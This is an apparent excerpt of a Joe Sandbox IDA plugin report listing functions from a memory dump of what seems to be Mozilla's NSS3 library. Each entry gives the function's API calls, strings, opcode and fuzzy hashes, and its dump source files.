9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CB5A891
%s at line %d of [%.10s], xrefs: 6CB5A8A0

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 912837312-598938438
Opcode ID: 3d71fd74389d7a7346188654644f6719d36d500be44d2bc707fbbc50a63668a6
Instruction ID: 9f717f4ae149051cadf9b074189bc7ee404d6969849fab90b1d99c76a1c26e4a
Opcode Fuzzy Hash: 3d71fd74389d7a7346188654644f6719d36d500be44d2bc707fbbc50a63668a6
Instruction Fuzzy Hash: 4C115935A00254ABCB048F21DC50A7EB7A5FF48325F404438FD095BB40EB30ED56CBA2

Function 6CABCAA0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

PR_GetEnvSecure.NSS3(NSS_DISABLE_UNLOAD,6CA9B1EE,D958E836,?,6CAD51C5), ref: 6CABCAFA
PR_UnloadLibrary.NSS3(?,6CAD51C5), ref: 6CABCB09
PR_GetEnvSecure.NSS3(NSS_DISABLE_UNLOAD,6CA9B1EE,D958E836,?,6CAD51C5), ref: 6CABCB2C
PR_UnloadLibrary.NSS3(6CAD51C5), ref: 6CABCB3E

Strings

NSS_DISABLE_UNLOAD, xrefs: 6CABCAF5, 6CABCB27

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: LibrarySecureUnload
String ID: NSS_DISABLE_UNLOAD
API String ID: 4190191112-1204168554
Opcode ID: 9019daf1541f2ae479275e4ec869f14cfa9c9a19347dd3f5a8ae8d20db12e74e
Instruction ID: 53d4e71860b1cf2934a3f8a23c77de22d920ca70156d5700973b12162c6768d4
Opcode Fuzzy Hash: 9019daf1541f2ae479275e4ec869f14cfa9c9a19347dd3f5a8ae8d20db12e74e
Instruction Fuzzy Hash: C911A2B5B006169BD758AF65D808B56B2B8BB09B8CF08413AD415A3A40D770E4D8CFD7

Function 6CA70DC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51stringCOMMON

Download Yara Rule

APIs

strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6CA70BDE), ref: 6CA70DCB
strrchr.VCRUNTIME140(00000000,0000005C,?,6CA70BDE), ref: 6CA70DEA
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6CA70BDE), ref: 6CA70DFC
PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6CA70BDE), ref: 6CA70E32

Strings

%s incr => %d (find lib), xrefs: 6CA70E2D

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: strrchr$Print_stricmp
String ID: %s incr => %d (find lib)
API String ID: 97259331-2309350800
Opcode ID: 7b9578957711fe788be3c8b65112e6aad5abbcbc0c7540934c07e3110c14fb00
Instruction ID: da9ea8a2b47391830009148d8ee9be0380d509d271878c3e69607baad1cb1b76
Opcode Fuzzy Hash: 7b9578957711fe788be3c8b65112e6aad5abbcbc0c7540934c07e3110c14fb00
Instruction Fuzzy Hash: 5701D4727002549FE6209F249C45E1B73BCEF46A09B19487DE909D3B42E762FC5886F1

Function 6CA02940 Relevance: 7.8, APIs: 6, Instructions: 327stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6CA01360,00000000), ref: 6CA02A19
memcpy.VCRUNTIME140(?,00000009,00000034,?,?,?,6CA01360,00000000), ref: 6CA02A45
memcpy.VCRUNTIME140(?,00000000,00000000), ref: 6CA02A7C

Part of subcall function 6CA02D50: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,1EE240A8,?,?,00000000,?,6CA0296E), ref: 6CA02DA4

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CA02AF3
memcpy.VCRUNTIME140(?,00000009,0000000C,?,?,?,6CA01360,00000000), ref: 6CA02B71
memset.VCRUNTIME140(00000000,00000000,00000034), ref: 6CA02B90

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: memcpystrlen$memset
String ID:
API String ID: 638109778-0
Opcode ID: 0ce981109056e93fbba1c55cef90e964c7a0ede7239640bacc888a284ce7318a
Instruction ID: b0fdd50742b7fff0821c456db340763b292f25d4bd29588b38c5fa489e86e678
Opcode Fuzzy Hash: 0ce981109056e93fbba1c55cef90e964c7a0ede7239640bacc888a284ce7318a
Instruction Fuzzy Hash: 74C1B171F007068BEB04CF69D894BAAB7B5BF89348F198329D9199B741D730E885CBD1

Function 6CA9CB60 Relevance: 7.8, APIs: 5, Instructions: 253COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE041,00000000,?,?,?,?,00000000,?,00000000,?,6CAA57DF,00000000,?,00000002,6CAA5840,?), ref: 6CA9CBB5
TlsGetValue.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,?,6CAA57DF,00000000,?,00000002,6CAA5840,?), ref: 6CA9CC4A
EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,?,00000000,?,00000000,?,6CAA57DF,00000000,?,00000002,6CAA5840), ref: 6CA9CC5E
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CA9CC98
PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CA9CD50

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Unlock$CriticalEnterErrorSectionValue
String ID:
API String ID: 1974170392-0
Opcode ID: ae72e7c5937cd11b819f4538f3c989d8aecc1dcb1275750878ef0cd66376aae4
Instruction ID: 25cb07e756f63120de65aaef43aa1fb9a12c4abd29216279af6eb1926fb1fb94
Opcode Fuzzy Hash: ae72e7c5937cd11b819f4538f3c989d8aecc1dcb1275750878ef0cd66376aae4
Instruction Fuzzy Hash: 2591C476E116189FDB00DFA8E882A9EBBF5FF09318F180125E805EB711E731E945CB91

Function 6CA1A910 Relevance: 7.7, APIs: 5, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fea2cd4b38d987e7c4df13670186897df1ab125d74cd345e8ad996d19e3710e
Instruction ID: 9339e908d6fa30b86eac5200f3bbfbc9f4bbdcfc50a31d9f33176112de889a99
Opcode Fuzzy Hash: 6fea2cd4b38d987e7c4df13670186897df1ab125d74cd345e8ad996d19e3710e
Instruction Fuzzy Hash: 6E91F2317082448FEB08DFA0D995B6A77BBBB0A705F18042DE50787E41CB34ADC9CB91

Function 6CA88B50 Relevance: 7.7, APIs: 5, Instructions: 218COMMON

Download Yara Rule

APIs

CERT_DecodeAVAValue.NSS3 ref: 6CA88B5C
CERT_DecodeAVAValue.NSS3 ref: 6CA88B67

Part of subcall function 6CA88E00: PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6CA88EED
Part of subcall function 6CA88E00: SEC_QuickDERDecodeItem_Util.NSS3(?,?,6CBB18D0,?), ref: 6CA88F03
Part of subcall function 6CA88E00: PR_CallOnce.NSS3(6CBE2AA4,6CAE12D0), ref: 6CA88F19
Part of subcall function 6CA88E00: PL_FreeArenaPool.NSS3(?), ref: 6CA88F2B

SECITEM_CompareItem_Util.NSS3(?,?), ref: 6CA88D5C
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CA88D6B
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CA88D76

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Item_Util$Decode$ArenaPoolValueZfree$CallCompareFreeInitOnceQuick
String ID:
API String ID: 185717074-0
Opcode ID: 0b2f8dd38a6241c10cbb34373fa26296834094dbcb1128f17eabedd40295e484
Instruction ID: a7b423b77ff2a58fb0a85a9adc62c9409aeeaeca0efe17e5d6a578a82b25dbe2
Opcode Fuzzy Hash: 0b2f8dd38a6241c10cbb34373fa26296834094dbcb1128f17eabedd40295e484
Instruction Fuzzy Hash: AA7127B1F436258FDB208A5988507AEB7F2FB49325F19826AD824D7785DB349C81C7D0

Function 6CA9C9E0 Relevance: 7.6, APIs: 5, Instructions: 132COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,?,?,00000000), ref: 6CA9CA21
EnterCriticalSection.KERNEL32(0000001C), ref: 6CA9CA35
PR_Unlock.NSS3(00000000), ref: 6CA9CA66
PR_SetError.NSS3(FFFFE041,00000000,00000000,?,?,00000000), ref: 6CA9CA77
PR_Unlock.NSS3(00000000), ref: 6CA9CAFC

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Unlock$CriticalEnterErrorSectionValue
String ID:
API String ID: 1974170392-0
Opcode ID: bd060d53b7be630c3acad4570d352cb0383518bb9121b0322c38caa352b3d209
Instruction ID: c66f85b9f4267ad4b72cf90c7a3ebd6ba88b837544e08ac6c6ca39de96a13511
Opcode Fuzzy Hash: bd060d53b7be630c3acad4570d352cb0383518bb9121b0322c38caa352b3d209
Instruction Fuzzy Hash: 9941F375E00A099BEF00EF64D942AABBBF5EF45388F184024ED1897B01DB30E954CBE1

Function 6CAF4A00 Relevance: 7.6, APIs: 5, Instructions: 126threadCOMMON

Download Yara Rule

APIs

PR_GetCurrentThread.NSS3 ref: 6CAF4A8D
CERT_SaveSMimeProfile.NSS3(00000000,00000000,00000000), ref: 6CAF4B01
CERT_DestroyCertificate.NSS3(00000000), ref: 6CAF4B12
PR_SetError.NSS3(?,00000000), ref: 6CAF4B1F
CERT_FindCertByIssuerAndSN.NSS3(?,?), ref: 6CAF4B35

Part of subcall function 6CAF04A0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,00000000), ref: 6CAF04B9
Part of subcall function 6CAF04A0: memcmp.VCRUNTIME140(?,?,?,?,?,?,?,?,00000000), ref: 6CAF050A
Part of subcall function 6CAF04A0: memcmp.VCRUNTIME140(?,00000000,?), ref: 6CAF0545

Part of subcall function 6CAF52E0: PORT_NewArena_Util.NSS3(00000400,6CAF4A57,?,00000000), ref: 6CAF52F7
Part of subcall function 6CAF52E0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,6CBB301C,6CAF4A57,?,6CAF4A57,?,00000000), ref: 6CAF5312
Part of subcall function 6CAF52E0: CERT_FindCertByIssuerAndSN.NSS3(?,?,?,?,?,?,?,6CAF4A57,?,00000000), ref: 6CAF5327
Part of subcall function 6CAF52E0: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,6CAF4A57,?,00000000), ref: 6CAF5334

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Util$Find$Arena_CertIssuermemcmp$CertificateCurrentDecodeDestroyErrorFreeItem_MimeProfileQuickSaveTag_Thread
String ID:
API String ID: 3052039812-0
Opcode ID: 71f3d8e43aa8f263905e64238e126215f8ab6d6847b796ef9485ac943bd8e765
Instruction ID: 04424c064c206a5b1e21de07a6b1949a55f7ce04b2a29578017bb88853510bbc
Opcode Fuzzy Hash: 71f3d8e43aa8f263905e64238e126215f8ab6d6847b796ef9485ac943bd8e765
Instruction Fuzzy Hash: 4231E5B1E022005BEB059E35AE40B7B36AC9F4531DF190178FC24ABB42E735D98AC7A5

Function 6CAC6AE0 Relevance: 7.6, APIs: 6, Instructions: 125stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6CAC6910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6CAC6943
Part of subcall function 6CAC6910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6CAC6957
Part of subcall function 6CAC6910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6CAC6972
Part of subcall function 6CAC6910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6CAC6983
Part of subcall function 6CAC6910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6CAC69AA
Part of subcall function 6CAC6910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6CAC69BE
Part of subcall function 6CAC6910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6CAC69D2
Part of subcall function 6CAC6910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6CAC69DF
Part of subcall function 6CAC6910: NSSUTIL_ArgStrip.NSS3(?), ref: 6CAC6A5B

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,00000000,6CAC781D,?,6CABBE2C,?,00000000,00000000), ref: 6CAC6B66
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,6CAC781D,?,6CABBE2C,?,00000000,00000000), ref: 6CAC6B88
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,6CAC781D,?,6CABBE2C,?,00000000,00000000), ref: 6CAC6BAF
free.MOZGLUE(00000000,?,?,?,?,00000000,00000000,6CAC781D,?,6CABBE2C,?,00000000,00000000), ref: 6CAC6BE6
free.MOZGLUE(?,?,?,?,?,00000000,00000000,6CAC781D,?,6CABBE2C,?,00000000,00000000), ref: 6CAC6BF7
free.MOZGLUE(6CAC781D,?,?,?,?,00000000,00000000,6CAC781D,?,6CABBE2C,?,00000000,00000000), ref: 6CAC6C08

Part of subcall function 6CAC6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6CAC781D,00000000,6CABBE2C,?,6CAC6B1D,?,?,?,?,00000000,00000000,6CAC781D), ref: 6CAC6C40
Part of subcall function 6CAC6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6CAC781D,?,6CABBE2C,?), ref: 6CAC6C58
Part of subcall function 6CAC6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6CAC781D), ref: 6CAC6C6F
Part of subcall function 6CAC6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6CAC6C84
Part of subcall function 6CAC6C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6CAC6C96
Part of subcall function 6CAC6C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6CAC6CAA

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: strcmpstrncmp$FlagL_strncasecmpfree$Strip$ParameterSecureSkip
String ID:
API String ID: 3779992554-0
Opcode ID: da85aa266eb07289f618a9142dbff2fa2deecc4997723ab1e50aa7458e397fc2
Instruction ID: 172b7d5d55cc55c6ca139ae72a7a62b6d3abb93069fb4fbe054762a004b289e7
Opcode Fuzzy Hash: da85aa266eb07289f618a9142dbff2fa2deecc4997723ab1e50aa7458e397fc2
Instruction Fuzzy Hash: 78417075F442199BEF00CEA5C940BFEB7B8AF19349F180525D814E7740EB35E984CBA2

Function 6CAD4B00 Relevance: 7.6, APIs: 5, Instructions: 119stringCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE09A,00000000,-00000001,00000000,?,?,6CAC7B3B,00000000,?,?,00000000), ref: 6CAD4BA3

Part of subcall function 6CAD8970: TlsGetValue.KERNEL32(?,00000000,6CA861C4,?,6CA85639,00000000), ref: 6CAD8991
Part of subcall function 6CAD8970: TlsGetValue.KERNEL32(?,?,?,?,?,6CA85639,00000000), ref: 6CAD89AD
Part of subcall function 6CAD8970: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6CA85639,00000000), ref: 6CAD89C6
Part of subcall function 6CAD8970: PR_WaitCondVar.NSS3 ref: 6CAD89F7
Part of subcall function 6CAD8970: PR_Unlock.NSS3(?,?,?,?,?,?,?,6CA85639,00000000), ref: 6CAD8A0C

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 6CAD4B44
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 6CAD4B7E
SECMOD_DestroyModule.NSS3(00000000), ref: 6CAD4C44
free.MOZGLUE(?), ref: 6CAD4C54

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Valuestrcmp$CondCriticalDestroyEnterErrorModuleSectionUnlockWaitfree
String ID:
API String ID: 3094473128-0
Opcode ID: 913f495008e75e2fc5ef6016f556f46646ed4f95b856a006fe8a167b533a3265
Instruction ID: 80799c5a8c4dcbd9e506de9c3ac82f2645c503a87f9a7ea91618584d3fd83a43
Opcode Fuzzy Hash: 913f495008e75e2fc5ef6016f556f46646ed4f95b856a006fe8a167b533a3265
Instruction Fuzzy Hash: C741F2B66003059BEB108F19EC0575AB3B8EF5575CF2A4124E929ABB00E731F994CBD2

Function 6CB9AA70 Relevance: 7.6, APIs: 5, Instructions: 114COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE89D,00000000), ref: 6CB9AA86

Part of subcall function 6CB2C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB2C2BF

Part of subcall function 6CB9A690: calloc.MOZGLUE(00000001,00000044,?,?,?,?,6CB9A662), ref: 6CB9A69E
Part of subcall function 6CB9A690: PR_NewCondVar.NSS3(?), ref: 6CB9A6B4

PR_IntervalNow.NSS3 ref: 6CB9AAEC
EnterCriticalSection.KERNEL32(?), ref: 6CB9AB0A
_PR_MD_NOTIFY_CV.NSS3(?), ref: 6CB9AB67
_PR_MD_UNLOCK.NSS3(?), ref: 6CB9AB8B

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: CondCriticalEnterErrorIntervalSectionValuecalloc
String ID:
API String ID: 318662135-0
Opcode ID: d0f0aee48bf9fbd49a6eedede41026cb02b2731cd528c0e2d372b319c701e9e5
Instruction ID: c51843ba29b89b76643435a6988f0a9fcb8dc2a91df2075e7eca820cf3e889ee
Opcode Fuzzy Hash: d0f0aee48bf9fbd49a6eedede41026cb02b2731cd528c0e2d372b319c701e9e5
Instruction Fuzzy Hash: 67417FB5E007458FC750DF69C9C095AB7F6FF8A318724856AE8198BB02E770E844CF91

Function 6CA7EDE0 Relevance: 7.6, APIs: 5, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CA7EDFD
calloc.MOZGLUE(00000001,00000000), ref: 6CA7EE64
PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6CA7EECC
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CA7EEEB
free.MOZGLUE(?), ref: 6CA7EEF6

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: ErrorValuecallocfreememcpy
String ID:
API String ID: 3833505462-0
Opcode ID: 53a2bec7cb8475790cd8795b31e92c6adcd8fd965fb9c57d172dbdd5e553b0f5
Instruction ID: b46f2b5f27910db39d828e05d970c43f3eb4bf58324329869d7626cc346437e9
Opcode Fuzzy Hash: 53a2bec7cb8475790cd8795b31e92c6adcd8fd965fb9c57d172dbdd5e553b0f5
